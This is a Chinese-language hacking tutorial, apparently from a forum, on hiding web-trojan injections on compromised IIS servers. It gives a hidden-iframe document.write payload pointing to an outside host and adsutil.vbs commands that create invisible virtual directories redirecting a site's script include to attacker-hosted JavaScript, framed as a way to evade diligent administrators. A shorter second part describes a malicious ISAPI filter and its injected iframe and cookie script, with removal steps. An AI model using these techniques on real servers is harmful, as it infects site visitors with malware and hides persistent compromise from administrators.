還有在國(guó)外的一些機(jī)器上，什么權(quán)限都拿到了也不知道他怎么弄的，什么都不讓寫(xiě)，好不容易寫(xiě)個(gè)文件沒(méi)一會(huì)又改回去了，真的讓人很!#$%%#%^#%^，據(jù)說(shuō)就有一種軟件能監(jiān)視重要的文件，一旦發(fā)現(xiàn)更改就會(huì)給恢復(fù)過(guò)去，譬如他監(jiān)視web目錄的話我們就不能更改他網(wǎng)站的任何內(nèi)容了。不過(guò)，看了很多大蝦的文章，自己也略微研究了下，也總算琢磨點(diǎn)東西出來(lái)，不用寫(xiě)任何文件就可以實(shí)現(xiàn)將別人的頁(yè)面涂改和大家經(jīng)常傳說(shuō)的掛馬等等后果，這里就給大家介紹下，那些只知道勤快的管理員也要小心了！

大家知道，我們?yōu)g覽網(wǎng)站的時(shí)候都是服務(wù)器將信息處理成Html方式再返回給我們，而我們要實(shí)現(xiàn)的是當(dāng)客戶訪問(wèn)的時(shí)候能改變他們?yōu)g覽器的內(nèi)容，使他隱蔽的執(zhí)行我們的東西如木馬等等。比較常見(jiàn)的方式就是引入Frame，設(shè)置屬性讓他在頁(yè)面不可見(jiàn)，或者不怕死的用javascript跳轉(zhuǎn)，比較高級(jí)點(diǎn)的會(huì)利用原代碼里的Html元素如script標(biāo)記或者frame標(biāo)記，然后在這些標(biāo)記里引入的其他文件或者頁(yè)面里做手腳，或者更改某些要在主頁(yè)上顯示的數(shù)據(jù)庫(kù)內(nèi)容，如修改數(shù)據(jù)庫(kù)里的公告實(shí)現(xiàn)掛馬。但是這些都需要在服務(wù)器的原代碼里加?xùn)|西或者修改網(wǎng)站的內(nèi)容，無(wú)論是跨站還是直接修改原代碼，這都是極其容易被發(fā)現(xiàn)的事，遇到一個(gè)勤快的管理員，你的東西就在服務(wù)器上呆不了多久了！還有就是如果一些頁(yè)面是不可寫(xiě)的我們也很郁悶，所以有必要尋找一種更隱蔽和更安全的掛馬方式解決上面的問(wèn)題！

我們首先去Iis管理器里看看吧！選中一個(gè)頁(yè)面看看他的屬性如圖一。呵呵，有個(gè)資源重定向吧！如果我們將這個(gè)頁(yè)面選擇重定向到我們已經(jīng)控制的一個(gè)頁(yè)面那么當(dāng)瀏覽器請(qǐng)求這個(gè)頁(yè)面的時(shí)候?qū)?huì)轉(zhuǎn)而去訪問(wèn)我們定義好的那個(gè)頁(yè)面，如果這個(gè)頁(yè)面是網(wǎng)頁(yè)木馬呢？很顯然，訪問(wèn)者就會(huì)被掛馬！這是很簡(jiǎn)單的方式，只需要在 IIs里更改頁(yè)面的重定向就可以了！任何能接觸到IIS管理器的人都能輕易做到！但是這樣還有問(wèn)題?。∪绻芾韱T發(fā)現(xiàn)頁(yè)面總被跳轉(zhuǎn)，在檢查網(wǎng)站的文件以及用備份等手段恢復(fù)還是沒(méi)有解決問(wèn)題的時(shí)候，他肯定會(huì)去IIS里看！一不小心看到主頁(yè)面的屬性就會(huì)發(fā)現(xiàn)哪里存在問(wèn)題然后就可以改回去了！

那么我們繼續(xù)看看有沒(méi)有更隱藏的方法！借助以前掛馬者的方法，既然主頁(yè)面很容易被發(fā)現(xiàn)，那么去看看主頁(yè)面里的Html標(biāo)記吧！如果發(fā)現(xiàn)有調(diào)用其他的頁(yè)面就好辦了！譬如里面主頁(yè)里有這樣的一個(gè)標(biāo)記：

<script src=include/mm2.js></script>

那么我們就有辦法了，去修改include/mms2.js的屬性吧！如圖二，轉(zhuǎn)到我們的某個(gè)頁(yè)面，內(nèi)容當(dāng)然要能在script標(biāo)記里解釋的了，如：

document.write("<8))e style=display:none; src=http://jnclovesw.com width=0 height=0></8))e>");

這樣就可以引入我們的頁(yè)面了！當(dāng)然最好還是先實(shí)現(xiàn)他JS的功能！那樣才夠隱蔽！現(xiàn)在管理員會(huì)發(fā)現(xiàn)首頁(yè)沒(méi)有更改，去IIs 里看首頁(yè)的屬性也沒(méi)有更改，甚至主機(jī)上的任何www文件都沒(méi)有修改，他會(huì)很郁悶吧！呵呵！如果他只是把以前的網(wǎng)站備份恢復(fù)回去也是沒(méi)有辦法把頁(yè)面改回去的！IIs文件那么多他總不能一個(gè)一個(gè)看屬性吧！這里順便提個(gè)問(wèn)題，就是你選擇重定向過(guò)去的文件必須是能被引用他的html標(biāo)記能解釋的，否則是沒(méi)有效果的！譬如一個(gè)<img src=1.jpg>你把1.jpg重定向到我們的木馬頁(yè)面是沒(méi)有用的，因?yàn)槟抉R頁(yè)面沒(méi)有被當(dāng)成Html解析，而是送到img標(biāo)簽里當(dāng)成圖片了！我想到的能利用的標(biāo)記也就是script還有frame，至于Css，我想也是能利用的，但是利用方法我還沒(méi)有找到！也不知道我分析得對(duì)不對(duì)，歡迎大家指教??！
讓我們繼續(xù)吧！假設(shè)萬(wàn)一你的管理員夠厲害或者夠勤快，他發(fā)現(xiàn)了你在mm2.js上面做了手腳，他就會(huì)從IIs里面把他恢復(fù)過(guò)去！我們的夢(mèng)想又破滅了！有沒(méi)有更隱蔽的方法呢？讓管理員在IIs里面都找不到呢？答案是肯定的！大家一定記得很久前的那個(gè)IIS配置漏洞，可以建立一個(gè)看不見(jiàn)的虛擬目錄，然后在里面建立后門(mén)！我們也可以借來(lái)利用哦！看看IIS配置漏洞的原理是說(shuō)建立一個(gè)沒(méi)有物理目錄的虛擬目錄，這樣就會(huì)在IIs里不可見(jiàn)，然后就可以在這個(gè)目錄里做些小動(dòng)作了！這里我們先建立一個(gè)不可見(jiàn)的虛擬目錄，如果主頁(yè)里調(diào)用了include文件夾下的js文件，我們就建立include目錄吧！這可以借助IIS 的腳本實(shí)現(xiàn)，其中adsutil.vbs腳本是在IIs的安裝目錄如C:InetpubAdminScripts下的，是控制IIS行為的一個(gè)腳本，我們用到的命令如下：

cscript adsutil.vbs Create W3SVC/1/Root/www/include "IIsWebVirtualDir"

這樣就會(huì)建立了個(gè)IIs里不可見(jiàn)的虛擬目錄，因?yàn)闆](méi)有設(shè)置路徑所以不會(huì)顯示哦！然后再在這個(gè)目錄下建立一個(gè)名字叫做mm2.js的虛擬目錄，呵呵！居然建立虛擬目錄是可以用到.等特殊字符的：

cscript adsutil.vbs Create W3SVC/1/Root/www/include/mm2.js "IIsWebVirtualDir"

這樣就存在一個(gè)include/mm2.js的虛擬目錄了！想到什么了？是不是跟主頁(yè)里調(diào)用的那個(gè)文件名字一直的哦！我們繼續(xù)往下做！

cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect "http://jnclovesw.com/mm1.js"

這樣是更改mm2.js虛擬目錄的重定向特性，如圖三。注意其中的W3SVC/1/Root/www/代表IIs下的第一個(gè)web服務(wù)器的www虛擬目錄，大家不清楚的話可以用adsutil.vbs的enum參數(shù)去查詢自己需要更改的網(wǎng)站，其他的操作可以打開(kāi) adsutil.vbs腳本的幫助看看！這樣操作之后就設(shè)置了虛擬目錄的重定向特性，現(xiàn)在試著在主頁(yè)里調(diào)用include/mm2.js，你猜猜返回的是 mm2.js的內(nèi)容還是我們的mm1.js的內(nèi)容呢？答案是mm1.js，如圖四，并且物理文件還是存在的！這也許是IIS的特性吧！他首先處理用戶的請(qǐng)求，并且虛擬目錄優(yōu)先于物理文件！然后我們?nèi)IS里看看有不有include虛擬目錄吧！如圖五，沒(méi)有吧！呵呵！這樣我們就成功的饒過(guò)權(quán)限的限制和管理員的檢測(cè)！將我們的木馬掛到了對(duì)方的網(wǎng)站上，并且除非對(duì)方重做IIs或者刪除我們隱藏的虛擬目錄，否則他是很難清除我們的木馬的！

文章很簡(jiǎn)單，關(guān)鍵是IIS腳本的命令和對(duì)IIs的一些認(rèn)識(shí)，這種掛馬方式適合于得到管理員權(quán)限之后掛馬，對(duì)付那些只是勤快的管理員還是很有用的！大家以后發(fā)現(xiàn)網(wǎng)站存在問(wèn)題記得要用這個(gè)腳本查看下有不有問(wèn)題哦！或者干脆把IIS的設(shè)置也備份吧！遇到問(wèn)題把IIs的設(shè)置也還原，呵呵！


2.全服務(wù)器被掛馬 網(wǎng)頁(yè)源文件中卻找不到掛馬代碼
一臺(tái)服務(wù)器 幾乎所有網(wǎng)站打開(kāi)網(wǎng)頁(yè) 甚至HTML網(wǎng)頁(yè) 都出現(xiàn)了

<8))e src="http://xxxdfsfd/web.htm" height=0 width=0></8))e>

這種樣式的代碼 一般在頭部 部分殺毒軟件打開(kāi)會(huì)報(bào)毒

打開(kāi)HTML或ASP PHP頁(yè)面 在源碼中怎么也找不到這段代碼

起初會(huì)懷疑是JS 找了半天還是沒(méi)有發(fā)現(xiàn) 連新建的HTML頁(yè)面 也會(huì)有這段代碼～

仔細(xì)尋找 問(wèn)題應(yīng)該在IIS上 打開(kāi)IIS 重新啟動(dòng)一次 在主IIS上 右鍵屬性 ISAPI 發(fā)現(xiàn)一個(gè)ISAPI擴(kuò)展 沒(méi)見(jiàn)過(guò)的

路徑為：c:windowshelpwanps.dll ISAP加載正常 綠色狀態(tài)

取消 重新啟動(dòng)IIS 所有代碼消失

加載項(xiàng)包含了三個(gè)文件：


wanps.ini內(nèi)容為：


Cookie=GAG5=ABCDEFG
Redirector=C:windowshelpwanps.txt

wanps.txt內(nèi)容為：


<body>
<8))e src="http://xxx.com/web.htm" height=0 width=0></8))e>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body> 

最新評(píng)論